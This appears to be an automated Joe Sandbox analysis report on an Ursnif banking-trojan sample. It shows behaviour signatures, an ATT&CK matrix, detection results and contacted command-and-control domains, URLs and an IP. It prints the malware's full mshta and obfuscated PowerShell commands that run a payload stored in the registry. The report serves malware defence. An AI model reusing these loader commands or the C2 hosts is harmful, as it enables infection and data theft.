                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1412Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\main.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9567Jump to behavior
                Source: C:\Users\user\Desktop\main.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Users\user\Desktop\main.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: main.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_0040134F LoadLibraryA,GetProcAddress,0_2_0040134F
                Source: unknownProcess created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe" "about:<hta:application><script>w6wy='wscript.shell';resizeto(0,2);eval(new activexobject(w6wy).regread('hkcu\\\software\\appdatalow\\software\\microsoft\\54e80703-a337-a6b8-cdc8-873a517cab0e\\\testlocal'));if(!window.flag)close()</script>
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([system.text.encoding]::ascii.getstring((fuuocwpse "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([system.text.encoding]::ascii.getstring((fuuocwpse "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))Jump to behavior
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\main.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_00401493
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D54EC cpuid 0_2_006D54EC
                Source: C:\Users\user\Desktop\main.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00401A49 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_00401A49
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_004012B0 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_004012B0
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D54EC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_006D54EC

                Stealing of Sensitive Information

                barindex
                Yara detected Ursnif
                Source: Yara matchFile source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.main.exe.6d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.main.exe.cb94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected Ursnif
                Source: Yara matchFile source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.main.exe.6d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.main.exe.cb94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts2
                Windows Management Instrumentation                		Path Interception11
                Process Injection                		21
                Virtualization/Sandbox Evasion                		1
                Input Capture                		1
                System Time Discovery                		Remote Services1
                Email Collection                		Exfiltration Over Other Network Medium2
                Encrypted Channel                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                Data Encrypted for Impact
                Default Accounts1
                Command and Scripting Interpreter                		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
                Process Injection                		LSASS Memory1
                Security Software Discovery                		Remote Desktop Protocol1
                Input Capture                		Exfiltration Over Bluetooth2
                Ingress Tool Transfer                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts3
                Native API                		Logon Script (Windows)Logon Script (Windows)1
                Obfuscated Files or Information                		Security Account Manager21
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares11
                Archive Collected Data                		Automated Exfiltration2
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
                Software Packing                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput CaptureScheduled Transfer12
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
                Application Window Discovery                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
                Account Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                System Owner/User Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                Remote System Discovery                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                File and Directory Discovery                		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing35
                System Information Discovery                		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 747122 Sample: main.exe Startdate: 16/11/2022 Architecture: WINDOWS Score: 100 18 lentaphoto.at 2->18 24 Snort IDS alert for network traffic 2->24 26 Malicious sample detected (through community Yara rule) 2->26 28 Antivirus / Scanner detection for submitted sample 2->28 30 3 other signatures 2->30 8 main.exe 6 2->8         started        12 mshta.exe 19 2->12         started        signatures3 process4 dnsIp5 20 iujdhsndjfks.ru 134.0.118.203, 49698, 80 AS-REGRU Russian Federation 8->20 22 lentaphoto.at 8->22 32 Writes or reads registry keys via WMI 8->32 34 Writes registry values via WMI 8->34 14 powershell.exe 15 12->14         started        signatures6 process7 process8 16 conhost.exe 14->16         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                main.exe62%VirustotalBrowse
                main.exe100%AviraTR/Crypt.XPACK.Gen7
                main.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                0.2.main.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                0.0.main.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                0.2.main.exe.6d0000.1.unpack100%AviraHEUR/AGEN.1245293Download File

                Domains

                SourceDetectionScannerLabelLink
                iujdhsndjfks.ru0%VirustotalBrowse
                lentaphoto.at1%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://iujdhsndjfks.ru/0%Avira URL Cloudsafe
                http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS0%Avira URL Cloudsafe
                http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QT0%Avira URL Cloudsafe
                http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pct0%Avira URL Cloudsafe
                http://lentaphoto.at/uploaded/YLQQ1pvNQgsiX0/6uEpUTz0reRtkFusB_2Bb/kfn6D0FsL9WVZQdI/aUDJFCy515UVsdg/0%Avira URL Cloudsafe
                http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pct0%Avira URL Cloudsafe
                http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pct0%Avira URL Cloudsafe
                http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuH0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                iujdhsndjfks.ru
                		134.0.118.203
                		truetrueunknown
                lentaphoto.at
                		unknown
                		unknowntrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pcttrue
                • Avira URL Cloud: safe
                		unknown
                http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pcttrue
                • Avira URL Cloud: safe
                		unknown
                http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pcttrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://iujdhsndjfks.ru/main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://nuget.org/NuGet.exepowershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTmain.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://go.micropowershell.exe, 0000000F.00000002.524619669.00000265A9BE3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDSmain.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Licensepowershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/Iconpowershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://lentaphoto.at/uploaded/YLQQ1pvNQgsiX0/6uEpUTz0reRtkFusB_2Bb/kfn6D0FsL9WVZQdI/aUDJFCy515UVsdg/main.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000F.00000002.508025334.00000265A80B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/Pester/Pesterpowershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHmain.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          134.0.118.203
                          		iujdhsndjfks.ruRussian Federation
                          		197695AS-REGRUtrue

                          General Information

                          Joe Sandbox Version:36.0.0 Rainbow Opal
                          Analysis ID:747122
                          Start date and time:2022-11-16 02:12:09 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 5m 16s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:main.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:17
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
